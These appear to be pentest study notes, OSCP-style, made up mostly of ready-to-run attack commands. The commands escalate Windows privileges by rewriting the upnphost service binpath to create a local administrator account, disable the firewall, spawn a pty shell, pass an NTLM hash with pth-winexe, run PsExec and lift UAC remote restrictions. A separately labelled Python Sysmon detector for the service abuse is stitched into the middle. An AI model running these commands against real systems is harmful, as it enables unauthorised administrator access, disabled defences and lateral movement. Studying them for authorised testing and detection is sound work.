keepnote
file transfer;
WinPrivCheck:
https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat
Local Privilege Escalation Abusing a Misconfigured Service (upnphost):
accesschk.exe -uwcqv "Authenticated Users" /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula
accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc config upnphost binpath= "net localgroup Administrators testxlab /add"
sc stop upnphost
sc start upnphost
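Added example, not part of these notes: a defender-side check for the service binpath abuse above, run over constructed Sysmon Event ID 13 (registry value set) records. The Sysmon field names (TargetObject, Details, Image) are real; the sample records and the LOLBin list are assumptions made for this example.

```python
import re
from typing import Optional

# Constructed Sysmon Event ID 13 records, reduced to the fields the check needs.
# Sample data written for this example, not real logs.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\sc.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\upnphost\ImagePath",
     "Details": "net user testxlab Password1 /add"},
    {"EventID": 13, "Image": r"C:\Windows\System32\sc.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\upnphost\ImagePath",
     "Details": "net localgroup Administrators testxlab /add"},
    # Benign: the service's normal ImagePath written by the service control manager.
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\upnphost\ImagePath",
     "Details": r"C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation"},
]

# Only ImagePath values under the Services key are of interest.
SERVICE_IMAGEPATH = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.IGNORECASE)
# Binaries a legitimate service ImagePath essentially never starts with (assumed list).
LOLBINS = {"net", "net1", "cmd", "powershell", "rundll32", "mshta", "certutil"}
ADMIN_GROUP = re.compile(r"localgroup\s+administrators\b", re.IGNORECASE)

def classify_image_path(details: str) -> Optional[str]:
    """Reason string if the new ImagePath is a command rather than a service binary, else None."""
    tokens = details.strip().split()
    if not tokens:
        return None
    # First token is the program: drop directory, quotes and the .exe suffix (a quoted
    # path containing spaces yields a partial name, which is never in LOLBINS).
    name = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    if name.endswith(".exe"):
        name = name[:-4]
    if name not in LOLBINS:
        return None
    if ADMIN_GROUP.search(details):
        return "ImagePath adds an account to Administrators"
    return f"ImagePath runs a LOLBin ({name})"

def detect_service_binpath_abuse(events):
    """Return (service, writing process, reason) for every suspicious ImagePath write."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = SERVICE_IMAGEPATH.search(ev.get("TargetObject", ""))
        if not m:
            continue
        reason = classify_image_path(ev.get("Details", ""))
        if reason:
            findings.append((m.group("svc"), ev.get("Image", ""), reason))
    return findings
```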
File Transfer via FTP
ftp> binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
cadaver http://10.11.1.14/
Python Interactive Shell (pty spawn)
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state off
Disable Windows firewall on older Windows versions:
netsh firewall set opmode disable
References
priv esc linux - hacking articles (abuse PATH variable) https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
priv esc - cronjob https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
priv esc - windows - services - sc https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
PtH
pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe
Via Sysinternals tools and Mimikatz:
PtH: get the user's NTLM hash (via RDP, MSF or other),
then open a new cmd; you can run commands via PsExec.
windows> PsExec.exe \\{IP} cmd
Tip: General usage with password:
PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd
If you get the error "Couldn't access otherComputer: Access is denied.",
run the following command on the target system (it sets LocalAccountTokenFilterPolicy to 1, which disables UAC remote restrictions for local accounts, so remote logons with a local admin account receive a full admin token):
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f